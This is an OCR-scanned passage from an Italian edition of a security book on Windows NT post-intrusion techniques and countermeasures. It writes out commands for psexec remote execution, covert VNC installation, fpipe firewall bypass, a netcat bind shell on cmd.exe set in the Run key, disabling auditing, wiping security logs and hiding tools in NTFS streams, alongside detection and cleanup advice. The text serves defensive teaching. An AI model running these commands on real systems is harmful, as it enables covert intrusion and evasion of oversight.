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netcat funziona bene quando vi occorre una porta particolare su cui lavorare, ma 
se avete accesso a SMB (TCP 139 o 445), il tool migliore da utilizzare è psexec di- 
sponibile all'indirizzo http://ww.sysinternals.com. psexec si limita a eseguire 
un comando sulla macchina remota utilizzando la sintassi seguente: 


C:\>psexec \\sever-name-or-ip -u admin username -p admin password command 
Ecco un esempio di un comando tipico: 

C:\>psexec \\10.1.1.1 -u Administrator -p password -s cmd.exe 

Non potrebbe essere più facile. Eravamo soliti raccomandare l’utilizzo del comando 
AT per pianificare l'esecuzione dei comandi su sistemi remoti; ma psexec facilita 


notevolmente questo processo, purché abbiate accesso all'SMB (la qual cosa è co- 
munque richiesta dal comando AT). 


® Controllo remoto dell’interfaccia grafica 


Diffusione: 10 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: 10 


Una shell dei comandi remota è una cosa fantastica, ma la famiglia NT è talmente 
dotata di funzionalità grafiche che una GUI remota sarebbe davvero un colpo da 
maestro. Se avete accesso al Terminal Services (installato facoltativamente su Win- 
dows 2000 e versioni successive), probabilmente avrete già a disposizione il miglior 
controllo remoto che la famiglia NT è in grado di offrire. Verificate se la porta TCP 
3389 è in ascolto sul server remoto violato e utilizzate qualsiasi credenziale valida 
acquisita in attacchi precedenti per autenticarvi. 

Se TS non è disponibile, dovrete probabilmente installare il vostro tool grafico di con- 
trollo remoto. L’eccellente tool gratuito VNC (Virtua! Network Computing) di AT&T 
Research Laboratories è la soluzione preferibile da questo punto di vista (http:// 
Ww.realvne.com/download.html); di VNG si parlerà ancora nel Capitolo 13. Uno 
dei principali punti di forza di VNC (oltre al fatto di essere gratuito!) risiede nella sua 
relativa facilità di installazione, sia locale sia da una connessione remota. Utilizzando 
un prompt dei comandi remoto, come abbiamo già visto in precedenza, è sufficiente 
installare il servizio VNC e aggiungere una singola chiave al Registro di sistema, in 
modo da consentire a VNC di essere avviato in modalità nascosta. Di seguito fornia- 
mo una breve guida all'installazione, invitandovi però a consultare la documentazio- 
ne completa per l'installazione di VNC, disponibile all'URL indicato in precedenza. Sa- 
rete così in grado di comprendere tutti i meccanismi di funzionamento di questa utili- 
ty a riga di comando. 

Come primo passo, sarà necessario copiare il programma VNC e tutti i file di sup- 
porto necessari sul sistema di destinazione (WINVNC.EXE, VNCHooks.DLL e 
OMNITHREAD_ RT.DLL). Questo può essere eseguito in qualunque directory, ma 
l'applicazione sarà naturalmente più nascosta se verrà copiata da qualche parte 
all'interno del percorso di %systemroot%. Dobbiamo anche sottolineare che le ulti 
me versioni di WINVNC aggiungono automaticamente una piccola icona verde nel- 
la barra delle applicazioni, rivelando in qualche modo la presenza del servizio ser- 
ver. Se avviate il servizio dalla riga di comando, ricordate che le versioni fino alla 
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3.3.2 sono in grado di funzionare in modalità praticamente invisibile all’utente che 
utilizza la console di sistema (ricordate comunque che WINVNC.exe viene ovvia- 
mente visualizzato nell'elenco dei processi attivi). 

Dopo aver copiato WINVNC.EXE, è necessario impostare la password di VNC. Ge- 
neralmente il servizio VNC presenta, quando viene avviato, una finestra di dialogo 
che richiede l'inserimento di una password prima di accettare le connessioni in en- 
trata (tutto questo a causa degli sviluppatori software fissati sulla sicurezza!). Occor- 
re inoltre indicare al servizio WINVNC di rimanere in attesa di connessioni in in- 
gresso, anch'esse definite tramite la GUI. Tutte queste informazioni possono essere 
inserite nel Registro di sistema, tramite l’utility regini.exe. 

Dobbiamo innanzitutto creare un file di testo chiamato WINVNC.INI nel quale inseri- 
re tutte le modifiche necessarie alle chiavi del Registro di sistema. I valori riportati di 
seguito sono stati ricavati da un'installazione locale di WINVNC e trasferiti nel file di 
testo con l’utility di NTRK regdmp (il valore in chiaro della password è secret). Il file 
WINVNC.INI ottenuto è il seguente: 


HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3 
SocketConnect = REG _DWORD 0x00000001 
Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e 


Possiamo quindi caricare le definizioni delle chiavi di registro utilizzando regini: 


C:\> regini -m \\192.168.202.33 winvnc.ini 
HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3 

SocketConnect = REG_DWORD 0x00000001 

Password = REG BINARY 0x00000008 0x57bf2d2e 0x9e6ch06e 


Per finire, dobbiamo installare il servizio WINVNC e avviarlo. La sessione seguente 
mostra la sintassi utilizzata per questa operazione (ricordatevi che questa è una 
shell dei comandi situata sul sistema remoto): 


C:\> winvnc -install 


C:\> net start winvnc 
The VNC Server service is starting. 
The VNC Server service was started successfully. 


Possiamo ora avviare l'applicazione vneviewer ed effettuare la connessione alla po- 
stazione remota. Le immagini seguenti mostrano le finestre di dialogo che vengono 
visualizzate. Nella prima immagine tentiamo la connessione al “display 0” della po- 
stazione, all'indirizzo IP 192.168.202.33 (la sintassi host:display è all'incirca equi- 
valente a quella del sistema X Window di UNIX: tutte le postazioni Microsoft Win- 
dows hanno il valore di display predefinito impostato a 0). La seconda immagine 
mostra la richiesta della password (la ricordate, vero?). 


RE vicserver [192168202300 n 
Use hast:display Cancel | 


seduta Options... 
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VNC Authentication 


L'interfaccia grafica remota prende vita sulla vostra postazione locale, come mostra- 
to nella Figura 5.9. Il cursore del mouse si comporta esattamente come se venisse 
utilizzato proprio quello del sistema remoto. 


$ Hagking Exposed: Network Security Secrets and € 


Dear boss 


I tm writing you this letter Lo compiain about. 


Lu) 


#  C:\WINNT> 
8 


Figura 5.9 


WinVNC connesso a un sistema remoto. Questa immagine è per lo più equivalente a ciò 
che trovereste nel computer remoto. 


VNC è veramente un programma potente ed è in grado di inviare al sistema remoto 
anche combinazioni complesse di tasti come Ctrl+Alt+Canc. Le possibilità sono illi- 
mitate. 


® Contromisure al controllo remoto 


Poiché questi tool richiedono l’accesso amministrativo per installarsi, la migliore 
contromisura consiste innanzitutto nell’evitare questo livello di compromissione. 
Abbiamo inserito in questo paragrafo alcuni suggerimenti sull’eliminazione di WIN- 
VNC, ma si tratta in realtà di una questione accademica. 
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Per interrompere in modo ortodosso il servizio WINVNC e rimuoverlo è sufficiente 
utilizzare i comandi seguenti: 


C:\> net stop winvnc 
C:\> winvnc -remove 


Per cancellare le chiavi di WinVNC dal Registro di sistema potete utilizzare l’utility 
reg.exe (NTRK), come illustrato in precedenza: 


C:\> reg delete \\192.168.202.33 
HKEY_LOCAL_MACHINE\System\ 
CurrentControlSet\Services\WinVNC 


Reindirizzamento delle porte 


I programmi di controllo remoto basati su shell che abbiamo illustrato in preceden- 
za sono stati trattati nel contesto di connessioni di controllo remoto dirette. Tuttavia, 
considerate la situazione in cui un firewall intermedio blocchi l’accesso diretto al si- 
stema target. Gli hacker più ingegnosi sono in grado di aggirare l'ostacolo utilizzan- 
do il metodo del reindirizzamento delle porte. Affronteremo in modo approfondito 
questo argomento nel Capitolo 14, mentre in questo paragrafo ci limiteremo a trat- 
tare alcuni strumenti e tecniche specifiche di NT. 

Una volta compromesso un sistema determinante, per esempio un firewall, l'hacker 
può utilizzare il reindirizzamento delle porte per inoltrare tutti i pacchetti verso una 
specifica destinazione. Il risultato di questa operazione è la possibilità per l'hacker 
di accedere a qualsiasi sistema prima protetto dal firewall (o simile). Il reindiriz- 
zamento si basa sull’ascolto in porte determinate e l'inoltro dei pacchetti grezzi a 
una destinazione secondaria prestabilita. In seguito, presenteremo alcuni metodi 
per configurare manualmente il reindirizzamento delle porte utilizzando netcat, 
rinetd e fpipe 


® fpipe 


Diffusione: 5 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 8 


fpipe è uno strumento per l’inoltro e il reindirizzamento delle porte TCP di origine, 
realizzato da Foundstone Inc. È in grado di creare un flusso TCP con una porta di 
origine opzionale scelta dall'utente. Questo processo è utile durante i tentativi di in- 
trusione, per superare i firewall configurati in modo da consentire il passaggio uni- 
camente a un certo tipo di traffico verso le reti interne. 

Il principio di funzionamento di fpipe si basa fondamentalmente sul reindirizza- 
mento. Avviate fpipe specificando una porta di ascolto sulla rete, una porta di de- 
stinazione remota (la porta che state cercando di raggiungere all’interno del 
firewall) e il numero di porta di origine locale (opzionale) desiderata. All'avvio, 
fpipe si mette in attesa di una connessione client sulla sua porta di ascolto. In cor- 
rispondenza di una connessione client, viene stabilita una nuova connessione con 
la macchina e la porta di destinazione sulla porta di origine locale specificata, cre- 
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ando un circuito completo. Una volta stabilita la connessione completa, fpipe inol- 
tra tutti i dati ricevuti sulla sua connessione in ingresso oltre il firewall e restituisce il 
traffico di risposta al sistema che ha avviato la connessione. Questo metodo fa sem- 
brare la configurazione di diverse sessioni netcat una pratica addirittura dolorosa, 
in quanto fpipe consente di eseguire la stessa operazione in modo trasparente. 

Di seguito illustreremo l'utilizzo di fpipe per impostare un reindirizzamento su un 
sistema manomesso, su cui è in esecuzione un server telnet protetto da un firewall 
che blocca la porta 23 (telnet), ma lascia libera la porta 53 (DNS). Di norma, non è 
possibile connettersi alla porta telnet direttamente sulla porta TCP 23, ma se confi- 
guriamo un fpipe sulla macchina host, in modo che i pacchetti ricevuti sulla porta 
53 vengano girati alla porta telnet, possiamo ottenere un risultato equivalente. La Fi- 
gura 5.10 mostra il redirezionamento fpipe in esecuzione sull’host compromesso. 


C:\cmd.exe - fpipe -v -153-r 23 192.168.234.37 


—y -1 53 —r 23 192.168 .234.37 
P .B1 — TCP port redirector. 
opyright 2980 <c> by Foundstone, Inc. 
ttp://www.foundstone.com 


istening for connections on port 53 
onnection accepted from 192.168.234.36 port 6466 
Attempting to connect to 192.168 .234.37 port 23 
Pipe connected: 

nî 192.168.234.36:6466 —> 192.168 .234.41:53 

Out: 192.168.234.41:1038 —> 192.168.234.37:23 

18 bytes received from outbound connection 
3 bytes received from inbound connection 

ytes received from outbound connection 

DULE E Ea NOOLI E LLON 


Figura 5.10 


Il redirezionamento fpipe in esecuzione su un host compromesso. fpipe è stato impostato per inoltrare 
le connessioni alla porta 53 per la 23 in 102.168.234.37: in quest'ultima vengono inoltrati i dati, 


La semplice connessione alla porta 53 dell'host consente all’hacker di attivare un 
prompt telnet sulla propria macchina. 

La funzionalità più interessante di fpipe è la sua capacità di specificare una porta di 
origine per il traffico. Durante i tentativi d’intrusione, questo è spesso necessario 
per aggirare un firewall o un router che permette il passaggio di traffico originato 
solo su alcune porte (per esempio, il traffico originato sulla porta TCP 25 può co- 
municare solo con il server di posta). Normalmente il protocollo ‘TCP/IP assegna 
alle connessioni client porte di origine di numero elevato, che in genere vengono 
filtrate dal firewall. Tuttavia, il firewall potrebbe consentire il passaggio del traffico 
DNS (come in effetti consente). fpipe può essere configurato per forzare l'utilizzo 
di una porta di origine specifica, in questo caso la porta DNS. In questo modo, il 
firewall “vede” il flusso di dati come un servizio autorizzato e lo lascia passare, 


origine per una connessione in uscita e la connessione viene chiusa, potreste 
non essere in grado di ricollegarvi alla macchina remota per un intervallo di 
tempo compreso tra 30 secondi e 4 minuti, a seconda del tipo e della versione 
del sistema operativo utilizzato. 


| ù Ricordate che se utilizzate l'opzione -s per specificare un numero di porta di 
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Contromisure generali 
alla manomissione dei privilegi 


A questo punto come riuscirete a ripulire tutti i guai che abbiamo causato e ad argi- 
nare ogni falla rimasta? Abbiamo utilizzato l’utente Administrator e sono state sfrut- 
tate le svariate funzionalità del sistema; inoltre, abbiamo sfiorato diverse sfaccettatu- 
re dell’architettura di Windows NT e sono stati installati e configurati file che po- 
trebbero presentarsi in un numero infinito di combinazioni differenti. Il compito di 
ripulire il sistema e prevenire ulteriori invasioni si rivela quindi particolarmente gra- 
voso. Forniamo a questo punto una serie di utili suggerimenti di carattere generale, 
cercando di trattare i quattro aspetti principali che sono stati affrontati finora: i nomi 
di file, le chiavi del Registro di sistema, i processi e, infine, le porte. 


zione sulle backdoor riportata nel Capitolo 14, in quanto prende in esame 


4 i In aggiunta a questo paragrafo, consigliamo vivamente di leggere la tratta- 
alcune contromisure di carattere generale per questi attacchi. 


Il miglior modo per affrontare la manomissione dei privilegi di qualsiasi siste- 
ma consiste nel reinstallare completamente il software del sistema da un sup- 
porto affidabile. Gli hacker consumati potrebbero potenzialmente nasconde- 
re certe backdoor che anche gli investigatori dotati di maggiore esperienza 
non sarebbero in grado di individuare. Questi consigli sono quindi forniti 
per il lettore e non sono consigliati come soluzione completa a questo tipo di 
attacchi. 


© Nomi di file 


Questi suggerimenti sono sicuramente i meno efficaci, perché qualunque hacker 
con un minimo di esperienza adotterà sicuramente l’accorgimento di modificare i 
nomi dei file o di adottare altre contromisure per nasconderli (si veda il paragrafo 
“Occultamento delle proprie tracce” nel prosieguo di questo capitolo), ma essi pos- 
sono consentire di fermare qualche intruso meno ricco di immaginazione che si in- 
filtra nei vostri sistemi. 

Abbiamo già nominato un certo numero di file da considerare veramente pericolosi: 
nc.exe (netcat), psexec.exe, WINVNC. exe, VNCHooks.dll, omnithread_rt.dll e fpi- 
pe .exe. Inoltre, molti dei worm IIS più perniciosi avranno copiato la shell cmd. exe 
in varie posizioni del disco; cercate root.exe, sensepost.exe e file dai nomi simili 
aventi la stessa dimensione di cmd. exe (236.304 byte su Windows 2000 e 375.808 
byte su Windows XP). Altre impronte comuni dei worm IIS sono i log che presenta- 
no il nome “TFTPxxx." Se qualcuno sta lasciando questi biglietti da visita sul vostro 
server senza che lo abbiate autorizzato, iniziate prontamente le indagini; avete visto 
come possono essere utilizzati. 

Controllate attentamente anche i file presenti all’interno delle diverse cartelle PRO- 
GRAMS\STARTUP\%nomeutente% nella directory %SYSTEMROOT%\PROFILES\. Tut- 
to quanto si trova all’interno di queste cartelle viene avviato al boot del sistema (ne ri- 
parleremo in seguito). 


Un'ottima misura preventiva per identificare le modifiche apportate al file 
system consiste nell’utilizzare gli strumenti di monitoraggio del checksum, 
come, per esempio, Tribwire (http://ww.tripwiresecurity.com). 
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a Con Windows 2000 è stato introdotto WFP (Windows File Protection), che 

o protegge i file di sistema creati durante l’installazione di questo sistema ope- 

rativo, impedendo che siano sovrascritti (ci riferiamo in particolare alla 
maggior parte dei file situati sotto systemroot%). 


Chiavi del Registro di sistema 


Al contrario della ricerca di file che possono essere facilmente rinominati, l’individua- 
zione dei valori nel Registro di sistema è un metodo molto efficace, poiché la maggior 
parte delle applicazioni che abbiamo illustrato si aspetta di trovare specifiche chiavi in 
posizioni ben determinate. Il primo posto dove andare a cercare è HKML\SOFTWARE 
€ HKEY_USERS\.DEFAULT\Software, in cui risiede la maggior parte delle chiavi relati- 
ve ai software installati. In particolare NetBus Pro e WinVNC creano le proprie chiavi 
rispettivamente nelle seguenti ramificazioni del registro: 

e HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3; 

e HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server. 


Utilizzando lo strumento a riga di comando reg. exe (disponibile come al solito nel 
Resource Kit di NT) è possibile eliminare queste chiavi molto facilmente anche in 
un sistema remoto. La sintassi da utilizzare è la seguente: 


reg delete [valore] \\macchina 
Per esempio: 


C:\> reg delete HKEY USERS\.DEFAULT\Software\ORL\WinVNC3 
\\192.168.202.33 


Posizione favorita per l’avvio di backdoor: l’avvio di Windows 


Avete anche visto una aspetto particolarmente importante: gli aggressori quasi sem- 
pre inseriscono nel Registro i valori necessari sotto le chiavi standard di avvio di 
Windows. Queste posizioni dovrebbero essere verificate con regolarità, andando alla 
ricerca di comandi dall’aspetto strano o pericoloso. Vi rammento che queste aree 
sono HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e RunOnce, Ru- 
nOnceEx e RunServices (solo per Win 9x). 

Le autorizzazioni di accesso a queste chiavi dovrebbero essere fortemente limitate 
ai normali utenti. L'impostazione predefinita di Windows NT è la seguente: il grup- 
po “Everyone” (ossia chiunque) è autorizzato all'operazione “Set Value” sulla chia- 
ve HKLM\..\..\Run. Questa autorizzazione dovrebbe essere modificata con le im- 
postazioni Security, Permissions di regedt32. 

Di seguito mostriamo un esempio di che cosa deve essere ricercato. La figura a pa- 
gina seguente, relativa a regedit, mostra un dispositivo di ascolto netcat imposta- 
to per essere avviato sulla porta 8080 al bootup, situato sotto HXLM\..\..\Run. 
L'hacker a questo punto dispone di una porta in perpetuo ascolto su questo siste- 
ma, finché l'amministratore non scopre l'intrusione e non rimuove manualmente la 
definizione dal Registro di sistema. 

Non dimenticate di verificare anche il contenuto delle cartelle %systemroot%\profi- 
les\%nomeutente%\ Start Menu\programs\startup. Anche questi file sono eseguiti 
automaticamente a ogni bootup. 
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Registro di sistema 
E} (] Windows 


Nome. Dci ro si REN 
ED] Curentversion | ab}(Predefinto) (valore non impostato) 
E {DI App Management | B]BrowserwebCheck “lnadwc.exe" 
FD App Paths [28] cOoMsMDEXE “romsmdexe -on" 
E-(I Applets [ab]netcat "C:TEMP\NCIINTINc + -d -e cmd.exe -p 8080" 
© errs [25] system Tray “SysTray. Exe" 


E (D] Control panel 
F-(J Controls Folder 
© cscsettings 
EB-(] DateTime 
E (] Dynamic Directory 
E (1 Explorer 
{{] Extensions i 
E (I Group Policy î 
a H32375P 
( Hints 
& (I Installer 
3) (] Internet Settings 
I IPconfTSP 
© meo 
41] MediaContentIndex 
4 ) ModuleUsage 
8} (] MS-DOS Emulation 
©] Netcache 
8) (] Ms 
©] Optimallayout 
8] policies 


Processi 


Per tutti gli strumenti e le utility di hacking che non possono essere rinominati o 
contraffatti in qualche modo, è molto utile eseguire un controllo regolare dei pro- 
cessi attivi nel sistema. Per esempio, è possibile pianificare periodicamente proce- 
dure o script che vadano alla ricerca dei processi remote. exe oppure nc. exe e che 
li interrompano. Un amministratore di sistema degno di questo nome non dovrebbe 
avere alcun motivo per avviare e utilizzare remote, perché questo programma non 
esegue alcun controllo di autenticazione dell’utente. Nell'esempio seguente ricorria- 
mo al comando at per avviare kill (che interrompe il processo remote .exe) ogni 
giorno alle sei. Questo esempio è abbastanza semplice, ma molto efficace. Se lo de- 
siderate potete modificare a vostro piacimento l’intervallo di esecuzione: 


C:\> at 6A /e:1 ""kill remote.exe" 
Added a new job with job ID = 12 


C:\> at 
Status ID Day Time Command Line 


C:\> kill remote.exe 
process #236 [remote.exe] killed 


Il programma rkill.exe (sempre disponibile nell’NTRK) è in grado di eseguire la 
stessa operazione su un server remoto, utilizzando una sintassi simile. In questo 
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caso però è necessario ottenere il PID (process ID, identificativo del processo) di 
remote.exe prima di poter interrompere la sua esecuzione, A tal fine ci si affida 
all’utility pulist (NTRK). Si potrebbe mettere a punto un sistema elaborato che 
consenta di pianificare l'esecuzione periodica di pulist con relativa ricerca con 
grep di stringhe perniciose, da trasferire successivamente a rkill. Purtroppo que- 
sto metodo viene aggirato con facilità se il programma remote .exe viene per esem- 
pio rinominato con un nome molto meno sospetto (come WINLOG.EXE). Questo 
metodo può essere invece di grande aiuto quando il processo non può essere rino- 
minato, come avviene nel caso di WINVNC. EXE. 


AT Scheduler. 


© Porte 


Anche se il programma nc è stato rinominato, l’utility netstat è comunque in grado 
di identificare le sessioni in ascolto o stabilite. Il modo migliore per catturare queste 
connessioni pirata consiste nell’avviare periodicamente netstat per rintracciarle. 
Nell'esempio illustrato di seguito, viene avviato il comando netstat -an sul server at- 
taccato, mentre è in corso una connessione attraverso remote e nc sulla porta 8080 
(per comprendere il significato del parametro - an potete digitare il comando netstat 
1?). Osservate che la connessione remota tramite remote avviene sulla porta TCP 139, 
mentre netcat è in ascolto sulla porta TCP 8080. Nel listato dell'output di netstat, 
per maggior chiarezza, abbiamo rimosso parte delle informazioni: 


=» Un buon posto in cui cercare segni rivelatori di compromissioni è la coda di 


C:\> netstat -an 
Active Connections 


Proto Local Address Foreign Address State 

TCP 192.168.202.44:139 0.0.0.0:0 LISTENING 
TCP 192.168.202.44:139 192.168.202.37:1817 ESTABLISHED 
TCP 192.168.202.44:8080 2.0.0.0:0 LISTENING 


TCP 192.168.202.44:8080 192.168.202.37:1784 ESTABLISHED 


Dalle informazioni raccolte da netstat possiamo innanzitutto concludere che la di- 
fesa migliore per eliminare il pericolo di connessioni attraverso remote è impedire 
l’accesso alle porte 135 e 139 su qualunque obiettivo potenziale. Potete ottenere 
questo risultato abilitando il filtro della porta sul firewall oppure disabilitando i bin- 
ding NetBIOS per le schede di rete esposte all’esterno, come illustrato in preceden- 
za in questo capitolo. 

L’output di netstat può essere elaborato da find con un pipe, in modo da effettua- 
fe una ricerca su porte specifiche. L'esempio seguente ricerca i server NetBus in 
ascolto sulla porta predefinita: 


netstat -an ! find "12345" 


FPORT di Foundstone (http://www. foundstone.com) fornisce la corrispondenza fi- 
nale tra processi e porte, elencando tutti i socket attivi e l'ID del processo che utiliz- 
za la connessione. Di seguito viene riportato un esempio dell'output: 


FPORT - Process port mapper 
Copyright(c) 2000, Foundstone, Inc. 
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http://www. foundstone.com 


PID NAME TYPE PORT 
184 IEXPLORE UDP 1118 
249 OUTLOOK UDP (1) 
265 MAPISP32 UDP 1104 
265 MAPISP32 UDP (1) 


Occultamento delle proprie tracce 


Dopo che un hacker ha ottenuto con successo le credenziali di un amministratore 
sul sistema, una delle sue preoccupazioni sarà cercare di nascondere le tracce della 
propria presenza. Dopo aver estorto diverse informazioni dalla postazione attacca- 
ta, cercherà di installare qualche backdoor, configurando il sistema per poter rigua- 
dagnare un facile accesso in futuro. In questo modo viene preparata la strada per 
ulteriori tentativi di conquista su altri sistemi della stessa rete. 


Disabilitazione dell’auditing delle attività 


Se l'amministratore di sistema è abbastanza informato sulle attività necessarie per 
garantire la sicurezza dei server, sicuramente avrà attivato l’auditing delle attività, 
come abbiamo già spiegato all’inizio di questo capitolo. Poiché l'attivazione dell’au- 
diting può portare al rallentamento complessivo del sistema (specialmente se sce- 
gliete di registrare gli eventi di tipo Success, terminati con successo, per le attività 
User & Group Management), la maggior parte degli amministratori di Windows NT 
non abilita l’auditing, oppure lo attiva per registrare unicamente alcune attività. No- 
nostante questa abitudine deprecabile, la prima operazione effettuata da un hacker 
consiste nel verificare, dopo aver raggiunto lo stato di Administrator, se l’auditing 
delle attività Policy è attivato. Nel malaugurato caso, seppur improbabile, che le at- 
tività vengano registrate, l’hacker si serve dell’utility auditpol (proveniente dal Re- 
source Kit di Windows NT), in grado di svolgere le necessarie funzioni di disabilita- 
zione dell’auditing. Nell'esempio seguente si osserva l'esecuzione di auditpol con 
l'argomento disable per disattivare l'auditing su un sistema remoto (l'output del 
programma è stato abbreviato per semplicità): 


C:\> auditpol /disable 
Running ... 


Local audit information changed successfully . 
New local audit policy ... 


(0) Audit Disabled 
AuditCategorySystem = No 


AuditCategoryLogon = Failure 
AuditCategoryObjectAccess No 


Al termine del “soggiorno” nel sistema, l’hacker si preoccuperà di abilitare nuovamen- 
te l’audit, utilizzando la stessa utility nel modo seguente: auditpol /enable. Il pro- 
gramma auditpol è in grado di conservare le singole impostazioni di audit del sistema. 
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Pulizia del log degli eventi 


Se le attività iniziali del nostro hacker Administrator hanno già lasciato qualche trac- 
cia nell'Event Log del server, costui potrà preoccuparsi di eliminare gli eventi incri- 
minati utilizzando l’Event Viewer (il visualizzatore degli eventi). Dopo essersi già 
autenticato sul server remoto, è possibile utilizzare l’Event Viewer locale per visua- 
lizzare, filtrare e cancellare il log remoto degli eventi. Questo processo potrà elimi- 
nare tutti gli eventi sospetti, ma lascerà un nuovo evento, che attesta che l'Ever/ Log 
è stato modificato dall’hacker. Questo potrebbe mettere in allarme i veri ammini- 
stratori di sistema. Un’alternativa consiste nel ricercare e modificare manualmente i 
vari file di log presenti nella directory \win7/\system32. L'impresa non è facile, a 
causa della complessa sintassi dei file di log. Esistono però altre possibilità. 

Il programma elsave, scritto da Jesper Lauritsen (http://www. ibt.ku.dk/jesper/NT- 
tools/) è un semplice strumento in grado di rimuovere gli eventi registrati nell'Event 
Log. Nell'esempio seguente, elsave viene utilizzato per ripulire completamente il Secu- 
rity Log del sistema remoto joel (sono ovviamente necessarie le corrette autorizzazioni 
sul server remoto): 


C:\> elsave -s \\joel -1 "Security" -C 


Occultamento dei file 


L’installazione sul sistema obiettivo di un toolkit da utilizzare in un secondo tempo 
consente a un hacker malintenzionato di risparmiare molto tempo. Tutte queste uti- 
lity possono costituire tuttavia un campanello di allarme che avvisa l'amministratore 
di sistema della presenza di un intruso. Questo è il motivo per cui l'hacker cercherà 
di escogitare metodi per nascondere i suoi file dalla vista degli utenti. 


attrib 


Nascondere un file è semplice quasi quanto copiarlo nella directory di destinazione. 
La vecchia applicazione DOS attrib può essere utilizzata per nasconderlo, come 
illustrato dalla sintassi seguente: 


attrib +h [directory] 


Questo comando nasconde file e directory, ma non è efficace in Explorer se è attiva 
l'opzione Show A! Files (Mostra tutti i file). 


Streaming dei file di NTFS 


Se nel sistema di destinazione è stato installato il file system di NT (NTFS), è possi- 
bile utilizzare una tecnica alternativa per nascondere i file. NTFS contiene una fun- 
zionalità che consente di suddividere un file in diversi flussi (stream). Microsoft de- 
finisce la tecnica di streaming come un meccanismo per aggiungere attributi o infor- 
mazioni addizionali a un file, senza dover ristrutturare il file system (per esempio, 
quando sono attivate le funzioni di compatiblità dei file Macintosh di NT). Questa 
tecnica può anche essere utilizzata per nascondere gli strumenti di un hacker malin- 
tezionato nei flussi dietro i file. 
Nell'esempio seguente, il file netcat.exe viene aggiunto come flusso a un file ge- 
nerico, trovato nella directory winnt\system32\0s2, in modo che possa essere uti- 
liz in attacchi successivi su altri sistemi remoti. Questo file è stato scelto per il 
uo nome ermetico, ma per questa operazione può essere utilizzato qualunque file. 
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Per creare il flusso, l’hacker deve impiegare l’utility POSIX chiamata cp (presente 
nel Resource Kit di Windows NT). La sintassi è semplice e richiede l'utilizzo del ca- 
rattere : nel file di destinazione per specificare il flusso: 


C:\>cp <file> 0s0001.009:<file> 
Per esempio: 
C:\>cp nc.exe 050001.009:nc.exe 


Questo comando nasconde nc. exe nell flusso "nc.exe" di 080001 .009. Per estrar- 
re netcat, dovete digitare la stringa seguente: 


C:\>cp 0s0001.009:nc.exe nc.exe 


Creando il flusso, la data di modifica di 080001 .009 viene aggiornata, ma la dimen- 
sione del file resta invariata (alcune versioni di cp lasciano inalterata anche la data). 
Per questo motivo i file di flusso sono veramente difficili da individuare. 

Per cancellare il file in un flusso è necessario trasferirlo in una partizione di tipo 
FAT e ricopiarlo nuovamente sulla partizione NTFS. 

Il file nascosto in un flusso può anche essere eseguito senza essere estratto. A causa 
delle limitazioni di cmd. exe, non è possibile eseguire direttamente i file in un flusso 
(che nel nostro caso è 080001 .009:nc.exe). Potete provare invece a utilizzare il co- 
mando start, come mostrato di seguito: 


start 050001.009:nc.exe 


(© Contromisure: ricerca dei flussi 


Un eccellente strumento di ricerca dei flussi è sfind di Foundstone (per ulteriori 
informazioni potete visitare l'indirizzo http://www. foundstone.com). 


Funzionalità di sicurezza di Windows NT 


Windows NT fornisce molti strumenti di gestione della protezione. Queste utility 
sono eccellenti sia per rafforzare un sistema sia per svolgere semplici operazioni di 
configurazione generale che contribuiscono a mantenere la messa a punto dei siste- 
mi in modo da evitare la creazione di falle. La maggior parte delle funzionalità illu- 
strate in questo paragrafo sono disponibili in Windows 2000 e versioni successive. 


Installazione di patch aggiornate 


Una delle contromisure più importanti per la sicurezza, lo abbiamo ripetuto numerose 
volte in questo capitolo, consiste nel tenersi aggiornati sugli hotfix e sui service pack di 
Microsoft. Tuttavia, al giorno d'oggi il download e l’installazione manuale del flusso 
ininterrotto di aggiornamenti software emanati da Microsoft è un lavoro a tempo pieno 
(a maggior ragione se gestite un numero elevato di sistemi Windows diversi). Quali so- 
luzioni sono disponibili per il monitoraggio e l'installazione automatizzata delle patch? 

Tra le opzioni più importanti disponibili occorre citare l’MBSA (Baseline Security 
Analyzer) di Microsoft destinato a coloro che non intendono effettuare spese eleva- 
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te per un tool maggiormente automatizzato (http://ww.microsoft.com/tech- 
net/tool/Tool/MBSAhome.asp); HFNetChk Pro o LT di Shavlik se siete disposti a 
fare qualche sacrificio per avere un tool migliore (http://ww.shavlik.com); il 
Software Update Service (SUS, già Windows Update Corporate Edition) gratuito di 
Microsoft per le organizzazioni di grandi dimensioni su cui viene eseguito Windows 
2000 con esigenze non complesse di installazione di patch (http://ww.micro- 
soft.com/windows2000/windowsupdate/sus/default.asp); infine, il SUS Feature 
Pack di SMS (Systems Management Server) per le aziende di grandi dimensioni con 
esigenze complesse quali reporting sullo stato, targeting, ampio supporto dei 
package (i service pack e gli aggiornamenti di Office non possono essere gestiti da 
SUS), rollback automatizzati, gestione della larghezza di banda e altre funzionalità 
maggiormente complesse non disponibili in SUS (http://ww.microsoft.com/sm- 
server/downloads/20/default.asp). A lungo termine, SMS sembra essere la solu- 
zione più promettente, ma attualmente non ci si può fare affidamento. 


Criterio di gruppo 


Uno degli strumenti più potenti tra tutti quelli disponibili in Windows 2000 Server è 
Criteri di gruppo. Gli oggetti GPO (Group Policy Object) possono essere memoriz- 
zati in Active Directory o su un computer locale per definire certi parametri di con- 
figurazione a livello di dominio esteso o locale. I GPO possono essere applicati a si- 
ti, domini o unità organizzative (OU) e vengono ereditati dagli utenti o dai compu- 
ter chiamati “membri” di quel GPO, 

I GPO possono essere visualizzati e modificati in qualunque finestra di console 
MMC (sono necessari i privilegi di Administrator). I GPO forniti con Windows 2000 
e versioni successive sono Criteri Computer locale, Criteri di dominio e Criteri Con- 
troller di dominio. Per richiamare l'oggetto Criteri Computer locale è sufficiente ese- 
guire Start/Esegui/gpedit.msc. Per visualizzare i GPO è anche possibile accedere 
alla finestra di dialogo delle proprietà di un oggetto di directory specifico (dominio, 
OU o sito) e poi selezionare la scheda Criterio gruppo, come mostrato nella figura 
seguente. Questa schermata visualizza il GPO particolare che si applica all'oggetto 
selezionato (l’elenco è in ordine di priorità), mostra se l’ereditarietà è bloccata e 
permette la modifica del GPO. 
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La modifica di un GPO rivela una moltitudine di configurazioni di protezione che 
possono essere applicate agli oggetti di directory; di particolare interesse è il nodo 
